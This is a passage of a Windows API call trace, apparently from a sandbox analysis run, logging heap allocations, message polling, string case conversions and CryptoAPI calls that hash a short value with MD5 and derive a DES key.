Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.759] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.759] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.759] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.759] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.760] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.760] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0200.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.761] CryptCreateHash (in: hProv=0xad63f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0200.761] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0200.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.762] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0200.763] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.763] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.763] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.764] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.764] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.764] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.764] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0200.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0200.764] CryptHashData (hHash=0xaa58e0, pbData=0x24b1c08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0200.764] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0200.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0200.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.765] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.765] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.766] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.766] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0200.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.767] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0200.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.767] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0200.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.767] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa58e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0200.767] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0200.768] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0200.769] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.770] HeapFree (in: hHeap=0x25c0000, 